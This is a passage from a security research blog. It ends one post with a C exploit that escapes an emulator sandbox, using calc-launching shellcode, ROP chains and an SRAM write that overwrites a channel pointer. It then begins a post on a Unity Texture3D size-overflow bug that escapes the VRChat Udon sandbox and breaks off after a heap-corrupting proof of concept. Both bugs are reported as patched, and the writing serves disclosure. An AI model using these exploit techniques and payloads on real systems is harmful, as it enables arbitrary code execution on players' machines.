<span class="giallo-l"><span style="color: #DCDCAA;"> EXI_Dma</span><span>(EXI_CHANNEL_0, buffer, size, EXI_WRITE,</span><span style="color: #569CD6;"> NULL</span><span>);</span></span>
<span class="giallo-l"><span>}</span></span>
<span class="giallo-l"></span>
<span class="giallo-l"><span style="color: #569CD6;">typedef struct</span><span> {</span></span>
<span class="giallo-l"><span> u8 </span><span style="color: #9CDCFE;">gap0</span><span>[</span><span style="color: #B5CEA8;">0x18</span><span>];</span></span>
<span class="giallo-l"><span> u64 </span><span style="color: #9CDCFE;">m_devices</span><span>[</span><span style="color: #B5CEA8;">3</span><span>];</span><span style="color: #6A9955;"> // IEXIDevice*[3]</span></span>
<span class="giallo-l"><span> u8 </span><span style="color: #9CDCFE;">gap30</span><span>[</span><span style="color: #B5CEA8;">0x8</span><span>];</span></span>
<span class="giallo-l"><span>}</span><span style="color: #4EC9B0;"> CEXIChannel</span><span>;</span></span>
<span class="giallo-l"><span style="color: #569CD6;">static_assert</span><span>(</span><span style="color: #569CD6;">sizeof</span><span>(CEXIChannel)</span><span style="color: #D4D4D4;"> ==</span><span style="color: #B5CEA8;"> 0x38</span><span>);</span></span>
<span class="giallo-l"></span>
<span class="giallo-l"><span style="color: #C586C0;">#define</span><span style="color: #DCDCAA;"> RAM_BASE</span><span style="color: #B5CEA8;"> 0x7FFF0000uL</span></span>
<span class="giallo-l"><span style="color: #C586C0;">#define</span><span style="color: #DCDCAA;"> TARGET_PTR_OFFSET</span><span style="color: #B5CEA8;"> 0x58</span></span>
<span class="giallo-l"></span>
<span class="giallo-l"><span style="color: #569CD6;">static</span><span style="color: #4EC9B0;"> u64</span><span style="color: #DCDCAA;"> guest_to_host_addr</span><span>(</span><span style="color: #569CD6;">const void*</span><span style="color: #9CDCFE;"> input</span><span>) {</span></span>
<span class="giallo-l"><span style="color: #C586C0;"> return</span><span> RAM_BASE </span><span style="color: #D4D4D4;">+</span><span> ((u32)input </span><span style="color: #D4D4D4;">&</span><span style="color: #B5CEA8;"> 0x7FFFFFFF</span><span>);</span></span>
<span class="giallo-l"><span>}</span></span>
<span class="giallo-l"></span>
<span class="giallo-l"><span style="color: #6A9955;">// Don't feel like writing my own calc shellcode for this</span></span>
<span class="giallo-l"><span style="color: #6A9955;">// https://github.com/boku7/x64win-DynamicNoNull-WinExec-PopCalc-Shellcode/blob/main/win-x64-DynamicKernelWinExecCalc.asm</span></span>
<span class="giallo-l"><span style="color: #569CD6;">static const</span><span> u8 shellcode[] </span><span style="color: #D4D4D4;">=</span></span>
<span class="giallo-l"><span style="color: #CE9178;"> "</span><span style="color: #D7BA7D;">\x48\x31\xff\x48\xf7\xe7\x65\x48\x8b\x58\x60\x48\x8b\x5b\x18\x48\x8b\x5b\x20\x48\x8b\x1b\x48\x8b\x1b\x48\x8b\x5b\x20\x49\x89\xd8\x8b</span><span style="color: #CE9178;">"</span></span>
<span class="giallo-l"><span style="color: #CE9178;"> "</span><span style="color: #D7BA7D;">\x5b\x3c\x4c\x01\xc3\x48\x31\xc9\x66\x81\xc1\xff\x88\x48\xc1\xe9\x08\x8b\x14\x0b\x4c\x01\xc2\x4d\x31\xd2\x44\x8b\x52\x1c\x4d\x01\xc2</span><span style="color: #CE9178;">"</span></span>
<span class="giallo-l"><span style="color: #CE9178;"> "</span><span style="color: #D7BA7D;">\x4d\x31\xdb\x44\x8b\x5a\x20\x4d\x01\xc3\x4d\x31\xe4\x44\x8b\x62\x24\x4d\x01\xc4\xeb\x32\x5b\x59\x48\x31\xc0\x48\x89\xe2\x51\x48\x8b</span><span style="color: #CE9178;">"</span></span>
<span class="giallo-l"><span style="color: #CE9178;"> "</span><span style="color: #D7BA7D;">\x0c\x24\x48\x31\xff\x41\x8b\x3c\x83\x4c\x01\xc7\x48\x89\xd6\xf3\xa6\x74\x05\x48\xff\xc0\xeb\xe6\x59\x66\x41\x8b\x04\x44\x41\x8b\x04</span><span style="color: #CE9178;">"</span></span>
<span class="giallo-l"><span style="color: #CE9178;"> "</span><span style="color: #D7BA7D;">\x82\x4c\x01\xc0\x53\xc3\x48\x31\xc9\x80\xc1\x07\x48\xb8\x0f\xa8\x96\x91\xba\x87\x9a\x9c\x48\xf7\xd0\x48\xc1\xe8\x08\x50\x51\xe8\xb0</span><span style="color: #CE9178;">"</span></span>
<span class="giallo-l"><span style="color: #CE9178;"> "</span><span style="color: #D7BA7D;">\xff\xff\xff\x49\x89\xc6\x48\x31\xc9\x48\xf7\xe1\x50\x48\xb8\x9c\x9e\x93\x9c\xd1\x9a\x87\x9a\x48\xf7\xd0\x50\x48\x89\xe1\x48\xff\xc2</span><span style="color: #CE9178;">"</span></span>
<span class="giallo-l"><span style="color: #CE9178;"> "</span><span style="color: #D7BA7D;">\x48\x83\xec\x20\x41\xff\xd6\xcc</span><span style="color: #CE9178;">"</span><span>;</span></span>
<span class="giallo-l"></span>
<span class="giallo-l"><span style="color: #569CD6;">int</span><span style="color: #DCDCAA;"> main</span><span>() {</span></span>
<span class="giallo-l"><span> u64 rop_3[]</span><span style="color: #DCDCAA;"> __attribute__</span><span>((</span><span style="color: #DCDCAA;">aligned</span><span>(</span><span style="color: #B5CEA8;">16</span><span>)))</span><span style="color: #D4D4D4;"> =</span><span> {</span></span>
<span class="giallo-l"><span style="color: #6A9955;"> // pop rdx; ret</span></span>
<span class="giallo-l"><span style="color: #B5CEA8;"> 0x4C06B2</span><span>,</span></span>
<span class="giallo-l"><span style="color: #DCDCAA;"> guest_to_host_addr</span><span>(shellcode),</span></span>
<span class="giallo-l"></span>
<span class="giallo-l"><span style="color: #6A9955;"> // pop r8; ret</span></span>
<span class="giallo-l"><span style="color: #B5CEA8;"> 0x4EE16B</span><span>,</span></span>
<span class="giallo-l"><span style="color: #569CD6;"> sizeof</span><span>(shellcode),</span></span>
<span class="giallo-l"><span> </span></span>
<span class="giallo-l"><span style="color: #6A9955;"> // memcpy</span></span>
<span class="giallo-l"><span style="color: #B5CEA8;"> 0xEB7E52</span><span>,</span></span>
<span class="giallo-l"><span> </span></span>
<span class="giallo-l"><span style="color: #6A9955;"> // call rax</span></span>
<span class="giallo-l"><span style="color: #B5CEA8;"> 0x41CFE9</span><span>,</span></span>
<span class="giallo-l"><span> </span></span>
<span class="giallo-l"><span style="color: #B5CEA8;"> 0</span><span>,</span></span>
<span class="giallo-l"><span style="color: #B5CEA8;"> 0</span><span>,</span></span>
<span class="giallo-l"><span> </span></span>
<span class="giallo-l"><span style="color: #6A9955;"> // Call from rop_2 points here</span></span>
<span class="giallo-l"><span style="color: #6A9955;"> // xchg esp, edx; ret</span></span>
<span class="giallo-l"><span style="color: #B5CEA8;"> 0x898285</span><span>,</span></span>
<span class="giallo-l"><span> };</span></span>
<span class="giallo-l"><span style="color: #C586C0;"> for</span><span> (</span><span style="color: #569CD6;">int</span><span> i </span><span style="color: #D4D4D4;">=</span><span style="color: #B5CEA8;"> 0</span><span>; i </span><span style="color: #D4D4D4;"><</span><span style="color: #569CD6;"> sizeof</span><span>(rop_3)</span><span style="color: #D4D4D4;"> /</span><span style="color: #569CD6;"> sizeof</span><span>(</span><span style="color: #9CDCFE;">rop_3</span><span>[</span><span style="color: #B5CEA8;">0</span><span>]); i</span><span style="color: #D4D4D4;">++</span><span>)</span></span>
<span class="giallo-l"><span style="color: #9CDCFE;"> rop_3</span><span>[i]</span><span style="color: #D4D4D4;"> =</span><span style="color: #DCDCAA;"> bswap64</span><span>(</span><span style="color: #9CDCFE;">rop_3</span><span>[i]);</span></span>
<span class="giallo-l"><span> </span></span>
<span class="giallo-l"><span> u64 rop_2[]</span><span style="color: #DCDCAA;"> __attribute__</span><span>((</span><span style="color: #DCDCAA;">aligned</span><span>(</span><span style="color: #B5CEA8;">16</span><span>)))</span><span style="color: #D4D4D4;"> =</span><span> {</span></span>
<span class="giallo-l"><span style="color: #6A9955;"> // pop rcx; ret</span></span>
<span class="giallo-l"><span style="color: #B5CEA8;"> 0x52ABB3</span><span>,</span></span>
<span class="giallo-l"><span style="color: #569CD6;"> sizeof</span><span>(shellcode),</span></span>
<span class="giallo-l"><span> </span></span>
<span class="giallo-l"><span style="color: #6A9955;"> // Common::AllocateExecutableMemory</span></span>
<span class="giallo-l"><span style="color: #6A9955;"> // Second argument doesn't matter</span></span>
<span class="giallo-l"><span style="color: #B5CEA8;"> 0xFD2F70</span><span>,</span></span>
<span class="giallo-l"><span> </span></span>
<span class="giallo-l"><span style="color: #6A9955;"> // add rsp, 0x38; ret</span></span>
<span class="giallo-l"><span style="color: #B5CEA8;"> 0x40C3DE</span><span>,</span></span>
<span class="giallo-l"><span style="color: #B5CEA8;"> 0</span><span>,</span><span style="color: #B5CEA8;"> 0</span><span>,</span><span style="color: #B5CEA8;"> 0</span><span>,</span><span style="color: #B5CEA8;"> 0</span><span>,</span><span style="color: #B5CEA8;"> 0</span><span>,</span><span style="color: #B5CEA8;"> 0</span><span>,</span><span style="color: #B5CEA8;"> 0</span><span>,</span></span>
<span class="giallo-l"></span>
<span class="giallo-l"><span style="color: #6A9955;"> // pop rdx; ret</span></span>
<span class="giallo-l"><span style="color: #B5CEA8;"> 0x4C06B2</span><span>,</span></span>
<span class="giallo-l"><span style="color: #DCDCAA;"> guest_to_host_addr</span><span>(rop_3),</span></span>
<span class="giallo-l"><span> </span></span>
<span class="giallo-l"><span style="color: #6A9955;"> // mov rcx, rax; call qword ptr [rdx+40h]</span></span>
<span class="giallo-l"><span style="color: #B5CEA8;"> 0x10EE58A</span></span>
<span class="giallo-l"><span> };</span></span>
<span class="giallo-l"><span style="color: #C586C0;"> for</span><span> (</span><span style="color: #569CD6;">int</span><span> i </span><span style="color: #D4D4D4;">=</span><span style="color: #B5CEA8;"> 0</span><span>; i </span><span style="color: #D4D4D4;"><</span><span style="color: #569CD6;"> sizeof</span><span>(rop_2)</span><span style="color: #D4D4D4;"> /</span><span style="color: #569CD6;"> sizeof</span><span>(</span><span style="color: #9CDCFE;">rop_2</span><span>[</span><span style="color: #B5CEA8;">0</span><span>]); i</span><span style="color: #D4D4D4;">++</span><span>)</span></span>
<span class="giallo-l"><span style="color: #9CDCFE;"> rop_2</span><span>[i]</span><span style="color: #D4D4D4;"> =</span><span style="color: #DCDCAA;"> bswap64</span><span>(</span><span style="color: #9CDCFE;">rop_2</span><span>[i]);</span></span>
<span class="giallo-l"></span>
<span class="giallo-l"><span style="color: #6A9955;"> // Since rdx points here, this doubles as the first ROP chain</span></span>
<span class="giallo-l"><span> u64 fake_vtbl[]</span><span style="color: #DCDCAA;"> __attribute__</span><span>((</span><span style="color: #DCDCAA;">aligned</span><span>(</span><span style="color: #B5CEA8;">16</span><span>)))</span><span style="color: #D4D4D4;"> =</span><span> {</span></span>
<span class="giallo-l"><span style="color: #6A9955;"> // pop rax; ret</span></span>
<span class="giallo-l"><span style="color: #B5CEA8;"> 0x4179B0</span><span>,</span></span>
<span class="giallo-l"><span style="color: #DCDCAA;"> guest_to_host_addr</span><span>(rop_2),</span></span>
<span class="giallo-l"></span>
<span class="giallo-l"><span style="color: #6A9955;"> // mov rsp, rax; ret</span></span>
<span class="giallo-l"><span style="color: #B5CEA8;"> 0x40EAB0</span><span>,</span></span>
<span class="giallo-l"></span>
<span class="giallo-l"><span style="color: #B5CEA8;"> 0x0</span><span>,</span></span>
<span class="giallo-l"><span style="color: #B5CEA8;"> 0x0</span><span>,</span></span>
<span class="giallo-l"><span style="color: #B5CEA8;"> 0x0</span><span>,</span></span>
<span class="giallo-l"><span style="color: #B5CEA8;"> 0x0</span><span>,</span></span>
<span class="giallo-l"><span style="color: #B5CEA8;"> 0x0</span><span>,</span></span>
<span class="giallo-l"><span style="color: #B5CEA8;"> 0x0</span><span>,</span></span>
<span class="giallo-l"><span style="color: #B5CEA8;"> 0x0</span><span>,</span></span>
<span class="giallo-l"><span style="color: #B5CEA8;"> 0x0</span><span>,</span></span>
<span class="giallo-l"><span style="color: #B5CEA8;"> 0x0</span><span>,</span></span>
<span class="giallo-l"></span>
<span class="giallo-l"><span style="color: #6A9955;"> // Initial call points here</span></span>
<span class="giallo-l"><span style="color: #6A9955;"> // xchg esp, edx; ret</span></span>
<span class="giallo-l"><span style="color: #B5CEA8;"> 0x898285</span><span>,</span></span>
<span class="giallo-l"><span> };</span></span>
<span class="giallo-l"><span style="color: #C586C0;"> for</span><span> (</span><span style="color: #569CD6;">int</span><span> i </span><span style="color: #D4D4D4;">=</span><span style="color: #B5CEA8;"> 0</span><span>; i </span><span style="color: #D4D4D4;"><</span><span style="color: #569CD6;"> sizeof</span><span>(fake_vtbl)</span><span style="color: #D4D4D4;"> /</span><span style="color: #569CD6;"> sizeof</span><span>(</span><span style="color: #9CDCFE;">fake_vtbl</span><span>[</span><span style="color: #B5CEA8;">0</span><span>]); i</span><span style="color: #D4D4D4;">++</span><span>)</span></span>
<span class="giallo-l"><span style="color: #9CDCFE;"> fake_vtbl</span><span>[i]</span><span style="color: #D4D4D4;"> =</span><span style="color: #DCDCAA;"> bswap64</span><span>(</span><span style="color: #9CDCFE;">fake_vtbl</span><span>[i]);</span></span>
<span class="giallo-l"></span>
<span class="giallo-l"><span> u64 fake_device </span><span style="color: #D4D4D4;">=</span><span style="color: #DCDCAA;"> bswap64</span><span>(</span><span style="color: #DCDCAA;">guest_to_host_addr</span><span>(fake_vtbl));</span></span>
<span class="giallo-l"><span> </span></span>
<span class="giallo-l"><span> CEXIChannel fake_channel;</span></span>
<span class="giallo-l"><span style="color: #DCDCAA;"> memset</span><span>(</span><span style="color: #D4D4D4;">&</span><span>fake_channel,</span><span style="color: #B5CEA8;"> 0x99</span><span>,</span><span style="color: #569CD6;"> sizeof</span><span>(fake_channel));</span></span>
<span class="giallo-l"><span style="color: #C586C0;"> for</span><span> (</span><span style="color: #569CD6;">int</span><span> i </span><span style="color: #D4D4D4;">=</span><span style="color: #B5CEA8;"> 0</span><span>; i </span><span style="color: #D4D4D4;"><</span><span style="color: #B5CEA8;"> 3</span><span>; i</span><span style="color: #D4D4D4;">++</span><span>)</span></span>
<span class="giallo-l"><span style="color: #9CDCFE;"> fake_channel</span><span>.</span><span style="color: #9CDCFE;">m_devices</span><span>[i]</span><span style="color: #D4D4D4;"> =</span><span style="color: #DCDCAA;"> bswap64</span><span>(</span><span style="color: #DCDCAA;">guest_to_host_addr</span><span>(</span><span style="color: #D4D4D4;">&</span><span>fake_device));</span></span>
<span class="giallo-l"></span>
<span class="giallo-l"><span style="color: #6A9955;"> // Overwrites g_Channels[0]</span></span>
<span class="giallo-l"><span style="color: #569CD6;"> static char</span><span style="color: #9CDCFE;"> buf</span><span>[TARGET_PTR_OFFSET </span><span style="color: #D4D4D4;">+</span><span style="color: #B5CEA8;"> 8</span><span>];</span></span>
<span class="giallo-l"><span> u64 ptr </span><span style="color: #D4D4D4;">=</span><span style="color: #DCDCAA;"> bswap64</span><span>(</span><span style="color: #DCDCAA;">guest_to_host_addr</span><span>(</span><span style="color: #D4D4D4;">&</span><span>fake_channel));</span></span>
<span class="giallo-l"><span style="color: #DCDCAA;"> memcpy</span><span>(buf </span><span style="color: #D4D4D4;">+</span><span> TARGET_PTR_OFFSET,</span><span style="color: #D4D4D4;"> &</span><span>ptr,</span><span style="color: #569CD6;"> sizeof</span><span>(ptr));</span></span>
<span class="giallo-l"><span style="color: #DCDCAA;"> __sram_write</span><span>(buf,</span><span style="color: #569CD6;"> sizeof</span><span>(buf));</span></span>
<span class="giallo-l"><span>}</span></span></code></pre>
<p>A few notes on it:</p>
<ul>
<li>That <code>xchg esp, edx; ret</code> stack pivot gadget works because the Fastmem arena gets allocated at a low enough address for main RAM to fit within the first 4GB of address space.</li>
<li>The <code>mov rsp, rax; ret</code> isn't a lucky desynced instruction but is actually the end of <code>ff_put_h264_chroma_mc8_rnd_mmx</code>. No idea why it's there, but it's a great gadget, so I can't complain.</li>
<li>Exploiting an emulator with a JIT means that I get convenient functions like <code>Common::AllocateExecutableMemory</code> for getting RWX memory instead of having to <code>VirtualAlloc</code> it myself.</li>
</ul>
<iframe width="100%" src="https://www.youtube-nocookie.com/embed/6Iz5MQybV3E" frameborder="0" allowfullscreen style="aspect-ratio: 32/9;" referrerpolicy="strict-origin-when-cross-origin"></iframe>
<p>I hope you had as much fun reading this as I did working on it! This was something I wanted to write back in January, but I put it off until now. What really pushed me to write this post was getting extremely annoyed at the number of clearly LLM-generated technical blog posts I kept seeing. I figured the only way to get more half-decent posts in the world is to start writing them myself again.</p>
<p>Thanks to <a rel="external" href="https://github.com/JLaferri">Fizzi</a> for the quick response in getting this vulnerability fixed.</p>
Breaking out of VRChat using a Unity bug2024-11-23T00:00:00+00:002024-11-23T00:00:00+00:00https://khang06.github.io/vrcescape/<p><em><strong>This vulnerability is patched in VRChat <a rel="external" href="https://docs.vrchat.com/docs/vrchat-202431p4">2024.3.1p4</a> and Unity <a rel="external" href="https://unity.com/releases/editor/whats-new/6000.0.20">6000.0.20f1</a>, <a rel="external" href="https://unity.com/releases/editor/whats-new/2022.3.48">2022.3.48f1</a> and <a rel="external" href="https://unity.com/releases/editor/whats-new/2021.3.44">2021.3.44f1</a>.</strong></em></p>
<p><em><strong>THIS DOESN'T MEAN THAT OTHER UNITY GAMES ARE VULNERABLE! Exploiting the bug requires far more user control than the vast majority of other games allow.</strong></em></p>
<p><a rel="external" href="https://hello.vrchat.com/">VRChat</a> is a fairly popular game that heavily revolves around user-generated content. It's well known for letting users express themselves by creating and uploading their own worlds and avatars for everyone to enjoy. As great <del>(or terrifying, depending on how long you've been on the internet)</del> as that sounds, letting users upload mostly whatever they want in such a free environment also exposes a massive attack surface for software vulnerabilities.</p>
<p>Specifically, I want to focus on VRChat's scripting language, <a rel="external" href="https://creators.vrchat.com/worlds/udon/">Udon</a>. Udon is a custom bytecode virtual machine used for scripting worlds which can be written either using the <a rel="external" href="https://creators.vrchat.com/worlds/udon/graph/">Udon Node Graph</a> or <a rel="external" href="https://creators.vrchat.com/worlds/udon/udonsharp/">UdonSharp</a>. As the name suggests, the Udon Node Graph is a graphical node-based environment driven by connecting inputs and outputs together with lines, while UdonSharp is an environment for compiling scripts written in C# directly to Udon bytecode. Here, I'll be using UdonSharp because I think it's significantly less painful to work with than the graphical editor.</p>
<p>The best part about Udon is that it not only exposes its own APIs, but it also allows the user to use a limited subset of Unity's APIs and the C# standard library. Combined with UdonSharp, this makes writing Udon scripts relatively painless for those who already know how to write C# code for Unity, while still sandboxing untrusted user scripts.</p>
<p><img src="/img/vrcescape/udontypeexposure.png" alt="" /></p>
<pre class="giallo" style="color: #E6E6E6; background-color: #222222;"><code data-lang="csharp"><span class="giallo-l"><span style="color: #569CD6;">using</span><span style="color: #4EC9B0;"> System</span><span>;</span></span>
<span class="giallo-l"><span style="color: #569CD6;">using</span><span style="color: #4EC9B0;"> UdonSharp</span><span>;</span></span>
<span class="giallo-l"><span style="color: #569CD6;">using</span><span style="color: #4EC9B0;"> UnityEngine</span><span>;</span></span>
<span class="giallo-l"><span style="color: #569CD6;">using</span><span style="color: #4EC9B0;"> VRC</span><span>.</span><span style="color: #4EC9B0;">SDKBase</span><span>;</span></span>
<span class="giallo-l"><span style="color: #569CD6;">using</span><span style="color: #4EC9B0;"> VRC</span><span>.</span><span style="color: #4EC9B0;">Udon</span><span>;</span></span>
<span class="giallo-l"></span>
<span class="giallo-l"><span style="color: #569CD6;">public class</span><span style="color: #4EC9B0;"> Cube</span><span> :</span><span style="color: #4EC9B0;"> UdonSharpBehaviour</span></span>
<span class="giallo-l"><span>{</span></span>
<span class="giallo-l"><span style="color: #569CD6;"> public override void</span><span style="color: #DCDCAA;"> Interact</span><span>()</span></span>
<span class="giallo-l"><span> {</span></span>
<span class="giallo-l"><span style="color: #9CDCFE;"> Debug</span><span>.</span><span style="color: #DCDCAA;">Log</span><span>(</span><span style="color: #CE9178;">"Stop poking me!!!"</span><span>);</span></span>
<span class="giallo-l"><span> }</span></span>
<span class="giallo-l"><span>}</span></span></code></pre>
<p>As long as no potentially dangerous APIs like process creation are exposed to Udon, it shouldn't be able to escape its sandbox, right?</p>
<p>You're reading this post, so obviously, there's more to it. Like every other program, Unity isn't perfectly written. Many of its sanity checks are there to make sure gamedevs don't accidentally blow their feet off, not to defend against malicious users. Although Udon doesn't expose everything, there's still a fairly large surface area to sift through. Let's take a closer look at one particular piece of the engine.</p>
<h1 id="unity-s-textures">Unity's Textures<a class="zola-anchor" href="#unity-s-textures" aria-label="Anchor link for: unity-s-textures"><i class="fas fa-link"></i></a>
</h1>
<p>Unity's texture classes are used for exposing direct access to texture data on the CPU and uploading them to the GPU. This is useful for dynamically creating and modifying textures without render targets or shaders, like so:</p>
<pre class="giallo" style="color: #E6E6E6; background-color: #222222;"><code data-lang="csharp"><span class="giallo-l"><span style="color: #6A9955;">// Create a new 128x128 RGBA32 texture with no mipmaps</span></span>
<span class="giallo-l"><span style="color: #4EC9B0;">Texture2D</span><span style="color: #9CDCFE;"> texture</span><span style="color: #D4D4D4;"> =</span><span style="color: #569CD6;"> new</span><span style="color: #4EC9B0;"> Texture2D</span><span>(</span><span style="color: #B5CEA8;">128</span><span>,</span><span style="color: #B5CEA8;"> 128</span><span>,</span><span style="color: #9CDCFE;"> TextureFormat</span><span>.</span><span style="color: #9CDCFE;">RGBA32</span><span>,</span><span style="color: #569CD6;"> false</span><span>);</span></span>
<span class="giallo-l"></span>
<span class="giallo-l"><span style="color: #6A9955;">// Fill it with a basic XOR pattern</span></span>
<span class="giallo-l"><span style="color: #6A9955;">// Not the most efficient way to do it, but this is just an example</span></span>
<span class="giallo-l"><span style="color: #C586C0;">for</span><span> (</span><span style="color: #569CD6;">int</span><span style="color: #9CDCFE;"> y</span><span style="color: #D4D4D4;"> =</span><span style="color: #B5CEA8;"> 0</span><span>;</span><span style="color: #9CDCFE;"> y</span><span style="color: #D4D4D4;"> <</span><span style="color: #B5CEA8;"> 128</span><span>;</span><span style="color: #9CDCFE;"> y</span><span style="color: #D4D4D4;">++</span><span>)</span></span>
<span class="giallo-l"><span>{</span></span>
<span class="giallo-l"><span style="color: #C586C0;"> for</span><span> (</span><span style="color: #569CD6;">int</span><span style="color: #9CDCFE;"> x</span><span style="color: #D4D4D4;"> =</span><span style="color: #B5CEA8;"> 0</span><span>;</span><span style="color: #9CDCFE;"> x</span><span style="color: #D4D4D4;"> <</span><span style="color: #B5CEA8;"> 128</span><span>;</span><span style="color: #9CDCFE;"> x</span><span style="color: #D4D4D4;">++</span><span>)</span></span>
<span class="giallo-l"><span> {</span></span>
<span class="giallo-l"><span style="color: #6A9955;"> // SetPixel takes a float color normalized from 0 to 1</span></span>
<span class="giallo-l"><span style="color: #569CD6;"> float</span><span style="color: #9CDCFE;"> val</span><span style="color: #D4D4D4;"> =</span><span> (</span><span style="color: #569CD6;">float</span><span>)(</span><span style="color: #9CDCFE;">x</span><span style="color: #D4D4D4;"> ^</span><span style="color: #9CDCFE;"> y</span><span>)</span><span style="color: #D4D4D4;"> /</span><span style="color: #B5CEA8;"> 0xFF</span><span>;</span></span>
<span class="giallo-l"><span style="color: #9CDCFE;"> texture</span><span>.</span><span style="color: #DCDCAA;">SetPixel</span><span>(</span><span style="color: #9CDCFE;">x</span><span>,</span><span style="color: #9CDCFE;"> y</span><span>,</span><span style="color: #569CD6;"> new</span><span style="color: #4EC9B0;"> Color</span><span>(</span><span style="color: #9CDCFE;">val</span><span>,</span><span style="color: #9CDCFE;"> val</span><span>,</span><span style="color: #9CDCFE;"> val</span><span>,</span><span style="color: #B5CEA8;"> 1.0f</span><span>));</span></span>
<span class="giallo-l"><span> }</span></span>
<span class="giallo-l"><span>}</span></span>
<span class="giallo-l"></span>
<span class="giallo-l"><span style="color: #6A9955;">// Upload it to the GPU</span></span>
<span class="giallo-l"><span style="color: #9CDCFE;">texture</span><span>.</span><span style="color: #DCDCAA;">Apply</span><span>();</span></span>
<span class="giallo-l"></span>
<span class="giallo-l"><span style="color: #6A9955;">// Put the texture on the cube</span></span>
<span class="giallo-l"><span style="color: #4EC9B0;">Renderer</span><span style="color: #9CDCFE;"> renderer</span><span style="color: #D4D4D4;"> =</span><span style="color: #DCDCAA;"> GetComponent</span><span><</span><span style="color: #4EC9B0;">Renderer</span><span>>();</span></span>
<span class="giallo-l"><span style="color: #9CDCFE;">renderer</span><span>.</span><span style="color: #9CDCFE;">material</span><span>.</span><span style="color: #9CDCFE;">mainTexture</span><span style="color: #D4D4D4;"> =</span><span style="color: #9CDCFE;"> texture</span><span>;</span></span></code></pre>
<p><img src="/img/vrcescape/xorcube.png" alt="" /></p>
<p>Unity's <code>Texture2D</code> class caps out at a resolution of 16384px on each axis, which matches the maximum texture size of <a rel="external" href="https://opengl.gpuinfo.org/displaycapability.php?name=GL_MAX_TEXTURE_SIZE">most modern PC graphics cards today</a>. With the RGBA32 texture format, where each of the four channels is stored as a byte, this ends up being a maximum texture size of <code>16384 * 16384 * 4 = 1073741824 bytes (1 GB)</code> <em>(technically this could be higher with other pixel formats, but RGBA32 is the easiest one to work with)</em></p>
<p>We can go beyond 2D, too. There's also a <code>Texture3D</code> class, which as the name suggests, exposes a texture with three dimensions instead of two. How exciting. Unlike the 2D version, this type of texture has a per-axis resolution limit of 2048. While that doesn't sound like much, it adds up to an absurd amount of memory: <code>2048 * 2048 * 2048 * 4 = 34359738368 bytes (32 GB!!!)</code></p>
<p>Because I could make textures that massive, I wanted to know what would happen if I allocated a texture that had a size just over the 32-bit unsigned integer limit. This might cause some strange behavior if Unity decides to store the texture size as a 32-bit integer somewhere, but assuming that everything is working properly, it should either allocate the whole thing or refuse to make a texture that large. Let's give it a shot:</p>
<pre class="giallo" style="color: #E6E6E6; background-color: #222222;"><code data-lang="csharp"><span class="giallo-l"><span style="color: #6A9955;">// Create a new 2048*2048*256 RGBA32 texture with no mipmaps</span></span>
<span class="giallo-l"><span style="color: #6A9955;">// 2048 * 2048 * 256 * 4 = 4294967296 or 0x1_0000_0000</span></span>
<span class="giallo-l"><span style="color: #4EC9B0;">Texture3D</span><span style="color: #9CDCFE;"> texture</span><span style="color: #D4D4D4;"> =</span><span style="color: #569CD6;"> new</span><span style="color: #4EC9B0;"> Texture3D</span><span>(</span><span style="color: #B5CEA8;">2048</span><span>,</span><span style="color: #B5CEA8;"> 2048</span><span>,</span><span style="color: #B5CEA8;"> 256</span><span>,</span><span style="color: #9CDCFE;"> TextureFormat</span><span>.</span><span style="color: #9CDCFE;">RGBA32</span><span>,</span><span style="color: #569CD6;"> false</span><span>);</span></span>
<span class="giallo-l"></span>
<span class="giallo-l"><span style="color: #6A9955;">// If we get to this point without throwing an exception, then it worked</span></span>
<span class="giallo-l"><span style="color: #9CDCFE;">Debug</span><span>.</span><span style="color: #DCDCAA;">Log</span><span>(</span><span style="color: #CE9178;">"Texture created successfully"</span><span>);</span></span></code></pre>
<p>Alright, looks like Unity's happy with the texture!</p>
<p><img src="/img/vrcescape/bigtex1.png" alt="" /></p>
<p>...but my memory usage didn't go up after creating the texture. Hmmm...</p>
<p><img src="/img/vrcescape/bigtex2.png" alt="" /></p>
<p>Maybe some weird lazy allocation stuff is happening? Let's try writing a bunch of pixels to it to see if that does anything:</p>
<pre class="giallo" style="color: #E6E6E6; background-color: #222222;"><code data-lang="csharp"><span class="giallo-l"><span style="color: #6A9955;">// This loop will write bytes spelling out "ABCD" in ASCII contiguously to start of the texture</span></span>
<span class="giallo-l"><span style="color: #6A9955;">// 3D textures are laid out in this order: x, y, z</span></span>
<span class="giallo-l"><span style="color: #6A9955;">// Think of it like a z-sized array of 2D x by y textures</span></span>
<span class="giallo-l"><span style="color: #6A9955;">// Remember that GetColor/SetColor take normalized float colors, but they will be converted to RGBA32</span></span>
<span class="giallo-l"><span style="color: #4EC9B0;">Color</span><span style="color: #9CDCFE;"> col</span><span style="color: #D4D4D4;"> =</span><span style="color: #569CD6;"> new</span><span style="color: #4EC9B0;"> Color</span><span>(</span><span style="color: #CE9178;">'A'</span><span style="color: #D4D4D4;"> /</span><span style="color: #B5CEA8;"> 255.0f</span><span>,</span><span style="color: #CE9178;"> 'B'</span><span style="color: #D4D4D4;"> /</span><span style="color: #B5CEA8;"> 255.0f</span><span>,</span><span style="color: #CE9178;"> 'C'</span><span style="color: #D4D4D4;"> /</span><span style="color: #B5CEA8;"> 255.0f</span><span>,</span><span style="color: #CE9178;"> 'D'</span><span style="color: #D4D4D4;"> /</span><span style="color: #B5CEA8;"> 255.0f</span><span>);</span></span>
<span class="giallo-l"><span style="color: #C586C0;">for</span><span> (</span><span style="color: #569CD6;">int</span><span style="color: #9CDCFE;"> i</span><span style="color: #D4D4D4;"> =</span><span style="color: #B5CEA8;"> 0</span><span>;</span><span style="color: #9CDCFE;"> i</span><span style="color: #D4D4D4;"> <</span><span style="color: #B5CEA8;"> 0x1000000</span><span>;</span><span style="color: #9CDCFE;"> i</span><span style="color: #D4D4D4;">++</span><span>)</span></span>
<span class="giallo-l"><span style="color: #9CDCFE;"> texture</span><span>.</span><span style="color: #DCDCAA;">SetPixel</span><span>(</span><span style="color: #9CDCFE;">i</span><span style="color: #D4D4D4;"> %</span><span style="color: #B5CEA8;"> 2048</span><span>,</span><span style="color: #9CDCFE;"> i</span><span style="color: #D4D4D4;"> /</span><span style="color: #B5CEA8;"> 2048</span><span style="color: #D4D4D4;"> %</span><span style="color: #B5CEA8;"> 2048</span><span>,</span><span style="color: #9CDCFE;"> i</span><span style="color: #D4D4D4;"> /</span><span style="color: #B5CEA8;"> 2048</span><span style="color: #D4D4D4;"> /</span><span style="color: #B5CEA8;"> 2048</span><span>,</span><span style="color: #9CDCFE;"> col</span><span>);</span></span></code></pre>
<p>...aaaaand that nuked the heap and crashed the game. (check the register values!)</p>
